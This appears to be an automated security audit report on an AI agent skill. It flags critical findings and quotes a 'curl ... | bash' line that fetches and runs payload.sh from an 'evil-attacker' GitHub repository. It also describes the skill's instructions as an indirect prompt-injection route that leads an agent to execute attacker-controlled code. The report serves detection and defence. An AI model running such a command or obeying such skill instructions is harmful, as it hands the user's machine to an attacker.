raw-github

Fail

Audited by Snyk on Apr 20, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 1.00). Yes — this is high risk because it directs curl|bash to execute a raw .sh from an untrusted/suspicious GitHub user/repo ("evil-attacker"), a common malware distribution pattern that can run arbitrary code.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This is high-risk: piping curl from an attacker-controlled raw.githubusercontent.com URL directly into bash executes arbitrary remote code and enables backdoors, remote code execution, supply-chain compromise, credential theft, data exfiltration, persistence, and privilege escalation.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 1.00). This skill's SKILL.md explicitly shows fetching and executing attacker-controlled content from raw.githubusercontent.com (https://raw.githubusercontent.com/evil-attacker/evil-repo/main/payload.sh via curl ... | bash), so the agent would ingest and act on untrusted third-party code that can change behavior.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).


MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs executing an attacker-controlled shell script via "curl ... | bash", which can run arbitrary commands (including creating users, modifying system files, or escalating privileges) and thus directly compromises the machine state.

Issues (5)

E005
CRITICAL

Suspicious download URL detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W011
MEDIUM

Third-party content exposure detected (indirect prompt injection risk).

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 20, 2026, 06:16 AM
Issues
5